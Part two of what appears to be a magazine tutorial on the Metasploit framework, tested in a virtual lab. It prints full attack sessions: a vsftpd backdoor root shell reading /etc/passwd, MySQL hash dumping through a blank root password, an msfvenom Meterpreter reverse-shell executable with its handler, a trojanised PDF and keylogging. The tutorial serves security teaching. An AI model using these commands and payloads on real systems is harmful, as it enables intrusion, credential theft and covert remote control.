« Previous 1 2
Hunt down vulnerabilities with the Metasploit pen-testing tool
Security Tools
Armitage and Meterpreter
To get a quick taste of Metasploit's capabilities, just click on the Armitage entry in the main menu in Parrot or Kali Linux. Tutorials Point [7] and Offensive Security [8] offer good beginner tutorials for point-and-click forensics (as a friend who is a trainer for the German police force calls them).
Armitage enjoys a good reputation among red teams, thanks to its collaboration mode, which the developers themselves refer to as multiplayer Metasploit or red team collaboration mode. Armitage (Figure 5) can also perform simple Nmap host scans from its main menu, but the true strength of the tool only becomes apparent when several users work together on a compromised host in a Meterpreter shell.
Meterpreter [9] is probably the most appealing payload an attacker can install on a remote computer. It can be easily hidden in other file formats (e.g., PDFs), sent as an email attachment, or embedded in websites. All it takes is for the victim to open a prepared website, email, or corresponding document, and the attacker gains control of the computer.
Meterpreter as a payload opens a reverse shell in this case – ransomware would now encrypt the computer and open a backdoor. A hijacked Windows 10 machine, for example, now gives the attacker access from the command line, perhaps even as the admin user. Long before PowerShell, the police trainer I referred to above cited Meterpreter as being the better shell for the Windows admin – not only because of the extensive command set, but also because of numerous helpful extensions like Mimikatz [10], which played a central role in the 2015 attack on the German Bundestag [11], helping to spy on the Active Directory domain and gain domain admin rights.
In the process, Meterpreter resides completely in the hijacked machine's RAM. Thanks to in-memory dynamic link library (DLL) injection, it does not write anything to the hard drive, does not create any new processes, and therefore ideally does not leave any permanent traces. Forensic experts call this a very small forensic footprint, but it can spill over into other running processes.
Meterpreter is extremely flexible, as well, which should come as no surprise, because it was designed to avoid the tricky decisions involved in choosing a suitable payload. Thanks to Meterpreter, you can do this later in the process from a remote shell without triggering alarms from virus scanners or similar tools.
From the command line, two basic methods are available: bind and reverse. With bind, Meterpreter listens locally on a port until the attacker connects. With reverse, the victim computer itself connects directly to the control server. The attacker must have configured it accordingly for the connection to work. Both approaches are useful in different scenarios.
All of the above can best be tested with Metasploitable. Version 2 of the image is now available with many additional security holes [12]. A complete list of all the vulnerabilities is beyond the scope of any article, but it is worth taking a look at the Exploitability Guide [13].
The image offered for download cannot be installed, because it is built for use in virtualized environments. It comes in the VMware VMDK format with separate configuration files. To use it in Libvirt/KVM, you have to download it from the Rapid7 website (this takes a bit of time because Rapid7 requires you to register) and then unpack and convert [14]. Running a script lets you edit the configuration file and create a new virtual machine with virsh
in Libvirt. Although it sounds complicated, it can be done with just three commands:
$ qemu-img convert -f vmdk Metasploitable.vmdk -O qcow Metasploitable.qcow2 $ wget https://bazaar.launchpad.net/~ubuntu-virt/virt-goodies/trunk/download/head:/vmware2libvirt $ python vmware2libvirt -f Metasploitable.vmx > Metasploitable.xml
The Ubuntu script worked without any problems on a laptop running openSUSE Tumbleweed in our lab. The command
zypper in virt-manager libvirtd
installs both the server service and the front end, but I was unable to convert the image with virt-v2v
in the test; hence, the Ubuntu script in the wget
command.
By default, the Metasploitable image uses the Libvirt default
network, which is set to NAT, thus isolating the machines in the test scenario from the rest of the network. Don't forget: libvirtd
only runs if systemd starts it, preferably permanently. The commands
systemctl enable libvirtd systemctl status libvirtd service libvirtd start
start libvirtd
, check that it was successful, and ensure an immediate start. The next step is to import the image:
virsh -c qemu:///system define Metasploitable.xml
The virtual machine manager (virt-manager
) will come up with a fully configured, bootable Metasploitable instance. It makes sense to ensure that the system automatically boots this instance and the associated network when booting or starting virt-manager
.
Now install Windows 10 on another virtual machine and do the same for Kali Linux and Parrot Linux (although the two Live distributions also work wonderfully without the install). For performance reasons, I decided to install both distributions on virtual disks.
After completing this preliminary work, start the test with ssh-copy-id
to transfer your own SSH key to the three Linux machines; an alias for each Linux makes life easier from now on. For Metasploitable, the username and password are msfadmin
. Kali usually does not have a root account (if it does, the password is toor
; otherwise, you can configure it during the installation), but it does have a kali
user with kali
as the password. Parrot Linux also uses toor
as the root password but largely disables the account.
The command
ssh-copy-id msfadmin@192.168.122.<nnn>
copies your public key to the virtual Metasploitable machine on IP address 192.168.122.nnn. Three aliases in ~/.alias
make life easier (Listing 1), and don't forget to source
after editing. Entries in the hostfile or in the DNS also help, as well.
Listing 1
Practical Aliases
alias metasploitable='ssh msfadmin@192.168.122.236' alias kali='ssh kali@192.168.122.192' alias parrot='ssh parrot@192.168.122.56'
At last, nothing stands in the way of an initial test of Metasploitable. Thanks to an intentional Telnet vulnerability, a backdoor opens up to the Parrot user (Listing 2). The example impressively shows the importance of signed software packages from reliable sources. Here, an attacker has obviously made sure that the FTP service on port 21 opens a backdoor with admin rights on port 6200 if – would you believe it? – the username of the vsftpd login contains a smiley (user mfeilner:)
). Then the second telnet
command in the example allows login-free access to a kind of root shell.
Listing 2
Telnet Backdoor
Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Jul 25 20:12:28 2021 from 192.168.122.1 [mfeilner@parrot][~] $ telnet 192.168.122.236 21 Trying 192.168.122.236... Connected to 192.168.122.236. Escape character is '^]'. 220 (vsFTPd 2.3.4) user mfeilner:) 331 Please specify the password. <pass> ^] telnet> quit Connection closed. [mfeilner@parrot][~] $ telnet 192.168.122.236 6200 Trying 192.168.122.236... Connected to 192.168.122.236. Escape character is '^]'. id; uid=0(root) gid=0(root) cat /etc/passwd; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh (...) reboot; Connection closed by foreign host.
Metasploitable runs many more insecure services that an Nmap scan brings to light (Listing 3), and because the nmap
command also finds a MySQL database on Metasploitable, the next example shows how an attacker could easily hijack the database management system – thanks to a missing root password. Listing 4 shows the entire command sequence and the return output from Parrot, MSF, and Metasploitable. The msfconsole
command launches the Metasploit framework's interactive shell. Listing 5 shows the verification by a MySQL command, including the retrieval of user data from /etc/passwd
.
Listing 3
Nmap Scan
[root@parrot][/] # nmap -p0-65535 metasploitable Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 22:05 CEST Nmap scan report for metasploitable (192.168.122.236) Host is up (0.095s latency). Not shown: 65506 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 3632/tcp open distccd 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 6697/tcp open ircs-u 8009/tcp open ajp13 8180/tcp open unknown 8787/tcp open msgsrvr 45901/tcp open unknown 46758/tcp open unknown 58453/tcp open unknown 60132/tcp open unknown MAC Address: 00:0C:29:FA:DD:2A (VMware) Nmap done: 1 IP address (1 host up) scanned in 31.35 seconds
Listing 4
Hijacking the MySQL Database
[root@parrot][/] # msfconsole (...) msf6 > use auxiliary/scanner/mysql/mysql_version msf6 auxiliary(scanner/mysql/mysql_version) > set RHOSTS metasploitable RHOSTS => metasploitable msf6 auxiliary(scanner/mysql/mysql_version) > run [+] 192.168.122.236:3306 - 192.168.122.236:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10) [*] metasploitable:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/mysql/mysql_version) > use auxiliary/admin/mysql/mysql_enum msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS metasploitable RHOSTS => metasploitable msf6 auxiliary(admin/mysql/mysql_enum) > run [*] Running module against 192.168.122.236 [-] 192.168.122.236:3306 - Access denied [*] Auxiliary module execution completed msf6 auxiliary(admin/mysql/mysql_enum) > set USERNAME root USERNAME => root msf6 auxiliary(admin/mysql/mysql_enum) > run [*] Running module against 192.168.122.236 [*] 192.168.122.236:3306 - Running MySQL Enumerator... [*] 192.168.122.236:3306 - Enumerating Parameters [*] 192.168.122.236:3306 - MySQL Version: 5.0.51a-3ubuntu5 (...) [*] 192.168.122.236:3306 - Enumerating Accounts: [*] 192.168.122.236:3306 - List of Accounts with Password Hashes: [+] 192.168.122.236:3306 - User: debian-sys-maint Host: Password Hash: [+] 192.168.122.236:3306 - User: root Host: % Password Hash: [+] 192.168.122.236:3306 - User: guest Host: % Password Hash: [*] 192.168.122.236:3306 - The following users have GRANT Privilege: [*] 192.168.122.236:3306 - User: debian-sys-maint Host: [*] 192.168.122.236:3306 - User: root Host: % [*] 192.168.122.236:3306 - User: guest Host: % [*] 192.168.122.236:3306 - The following users have CREATE USER Privilege: (...) [*] Auxiliary module execution completed msf6 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root USERNAME => root msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS metasploitable RHOSTS => metasploitable msf6 auxiliary(scanner/mysql/mysql_hashdump) > run [+] 192.168.122.236:3306 - Saving HashString as Loot: debian-sys-maint: [+] 192.168.122.236:3306 - Saving HashString as Loot: root: [+] 192.168.122.236:3306 - Saving HashString as Loot: guest: [*] metasploitable:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 > use /auxiliary/scanner/mysql/mysql_login [*] Using auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > use /auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS metasploitable RHOSTS => metasploitable msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root USERNAME => root msf6 auxiliary(scanner/mysql/mysql_login) > run [+] 192.168.122.236:3306 - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a [!] 192.168.122.236:3306 - No active DB -- Credential data will not be saved! [+] 192.168.122.236:3306 - 192.168.122.236:3306 - Success: 'root:' [*] metasploitable:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
As you can see at the end of Listing 5, Metasploit does not yet use a database for the captured data here, so it does not leave any traces either. If you do use a database (PostgreSQL by default), you can draw on a few more helpful functions. The command
service postgresql start
Listing 5
Verification with a MySQL Command
(mfeilner@kali)-[~] $ mysql -h metasploitable -u root Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 15 (...) MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | dvwa | | metasploit | | mysql | | owasp10 | | tikiwiki | | tikiwiki195 | +--------------------+ 7 rows in set (0.001 sec) MySQL [(none)]> select load_file('/etc/passwd'); +----------------------------------------------(...) + | load_file('/etc/passwd') (...) + | root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh (...) proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false (...) + 1 row in set (0.001 sec)
starts PostgreSQL, so next you need to initialize it for Metasploit (Listing 6). The db_nmap
command populates the database with hosts.
Listing 6
Initializing Database for Metasploit
(root@kali)-[/home/mfeilner] # msfdb init [+] Starting database [+] Creating database user 'msf' Enter the password of the new role: Enter it again: [+] Creating databases 'msf' (...) [+] Creating databases 'msf_test' (...) [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema (root@kali)-[/home/mfeilner] msf6 > help database Database Backend Commands ========================= Command Description ------- ----------- analyze Analyze database information about a specific (...) db_nmap Executes nmap and records the output (...) msf6 > db_nmap -v -sV 192.168.122.0/24 (...) [*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 66.64 seconds msf6 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.122.1 Unknown device 192.168.122.56 parrot Unknown device 192.168.122.192 kali Unknown device 192.168.122.236 metasploitable Linux server
As Listing 7 shows, Metasploit now automatically runs the mysql-login
scan against all listed hosts and also finds the vulnerable root account without a password. All other cases have dictionaries for a password attack on /usr/share/metasploit-framework/data/wordlists
. You can apply them by typing:
SET PASS_FILE /<path/to/list>
Listing 7
MySQL Scan with Database
msf6 > use /auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > run [-] 192.168.122.1:3306 - 192.168.122.1:3306 - Unable to connect: The connection was refused by the remote host (192.168.122.1:3306). [*] Scanned 1 of 5 hosts (20% complete) (...) [*] Scanned 4 of 5 hosts (80% complete) [+] 192.168.122.236:3306 - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a [+] 192.168.122.236:3306 - 192.168.122.236:3306 - Success: 'root:' [*] Scanned 5 of 5 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/mysql/mysql_login) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- 192.168.122.236 192.168.122.236 3306/tcp (mysql) root Blank password
In Listing 7, creds
shows all available, automatically acquired login data.
Even though the multistage Metasploit workflow is now clearer, the examples only outline the possibilities the framework offers. Even search login
in the MSFconsole returns 248 exploits that could be used to log on to your systems. For example,
use auxiliary/scanner/smb/smb_login
helps you find out whether a Samba/Windows/Active Directory login also works for other services or servers.
If all of this is not enough, an attacker can use extensions like Autopwn (Listing 8) to make it even easier to hijack third-party machines in an automated process. The module was removed from Metasploit's standard scope in recent years.
Listing 8
Retroactive Autopwn Install
# cd /usr/share/metasploit-framework/plugins # sudo wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb # mfsconsole msf6 > load db_autopwn [*] Successfully loaded plugin: db_autopwn
Windows 10 and More
Metasploitable is not used in Listing 9, but it shows an attack on the Windows 10 instance. The latest versions of Microsoft's operating system already come with a considerable number of protection mechanisms; in this article, I avoid describing workarounds or sources for downloading the exploit.
Listing 9
Remote Shell on Windows 10
(mfeilner@kali)-[~] $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.192 -f exe -o /tmp/backdoor.exe (mfeilner@kali)-[~] $ msfconsole msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > set LHOST 192.168.122.192 LHOST => 192.168.122.192 msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.122.192:4444 [*] Sending stage (175174 bytes) to 192.168.122.43 [*] Meterpreter session 1 opened (192.168.122.192:4444 -> 192.168.122.43:57816) at 2021-07-26 01:49:31 +0200 meterpreter > execute -f cmd.exe -i -H Process 6500 created. Channel 1 created. Microsoft Windows [Version 10.0.19042.1110] (c) Microsoft Corporation. All rights reserved. C:\Users\mfeilner\Desktop>
In this example, msfvenom
[15] creates an EXE file that contains a Meterpreter backdoor. With social hacking, the attacker can get the Windows user to throw all warnings (Figure 6) to the wind and execute the file. If this works, the attack can be configured and started with a few Metasploit commands. At the end of the day, the attacker has a remote administrator shell on Windows 10.
This method also works with a PDF file, as Listing 10 shows. However, this requires an original file that you use to infect. In the example, simply viewing the PDF document on the victim's computer opens a remote shell for the attacker. They could now install a keylogger (e.g., keyscan_start
); keyscan_dump
returns the input.
Listing 10
An Infected PDF
(mfeilner@kali)-[~] $ msfconsole msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe (...) msf6 > set EXENAME reverse.exe (...) msf6 > set FILENAME tibet.pdf (...) msf6 > set INFILENAME /tmp/test.pdf (...) msf6 > set OUTPUTPATH /tmp (...) msf6 > set PAYLOAD windows/meterpreter/bind_tcp
Another danger is when the attacker selects one process [16] and switches to another process used by the admin with migrate<PID>
. The attacker can retrieve the PID with tools like ps
(in the remote shell). The keylogger outputs the keystrokes fielded by the respective process – the winlogon.exe
process is worth looking at, for example.
Windows 10 or PDF viewers are by no means the only targets: The news on the Meterpreter homepage turns out to be a real treasure trove for Apple hackers [17], and an Infosec [18] blog post describes how easy it is to hijack an Android device with an infected APK package. Again, this just involves five steps, thanks to Metasploit.
Infos
- Metasploit Framework: https://docs.rapid7.com/metasploit/msf-overview/
- "Pen testing and PDF manipulation with Metasploit" by Hans-Peter Merkel and Markus Feilner, Linux Magazine , issue 121, December 2010, p. 18
- "Hacker trainer for law enforcement agents" by Markus Feilner, Linux Magazine , issue 102, May 2009, p. 92, https://www.linux-magazine.com/Issues/2009/102/Forensics-in-Freiburg
- "The sys admin's daily grind – Metasploitable" by Charly Kühnast, Linux Magazine , issue 172, March 2015, p. 66, https://www.linux-magazine.com/Issues/2015/172/Charly-s-Column-Metasploitable
- "Metasploit Wrap-Up" by Dean Welch, Rapid7 blog: https://www.rapid7.com/blog/post/2021/10/22/metasploit-wrap-up-135/
- "Contributing to Metasploit": https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
- Tutorials Point: https://www.tutorialspoint.com/metasploit/metasploit_armitage_gui.htm
- Offensive Security: https://www.offensive-security.com/metasploit-unleashed/armitage/
- Meterpreter: https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
- Mimikatz: https://www.offensive-security.com/metasploit-unleashed/mimikatz/
- German Parliament hacked: https://it-akten.de/digital-attack-on-german-parliament/
- Metasploitable: https://information.rapid7.com/download-metasploitable-2017.html
- Exploitability guide: https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
- Image conversion: https://linux-hacking-guide.blogspot.com/2015/05/convert-vmware-virtual-machine-to-kvm.html
- msfvenom: https://www.hackingarticles.in/msfvenom-tutorials-beginners/
- Keyloggers: https://www.offensive-security.com/metasploit-unleashed/keylogging/
- Meterpreter and Apple: https://meterpreter.org/category/apple/
- Hijacking Android: https://resources.infosecinstitute.com/topic/lab-hacking-an-android-device-with-msfvenom/]
« Previous 1 2
Buy this article as PDF
(incl. VAT)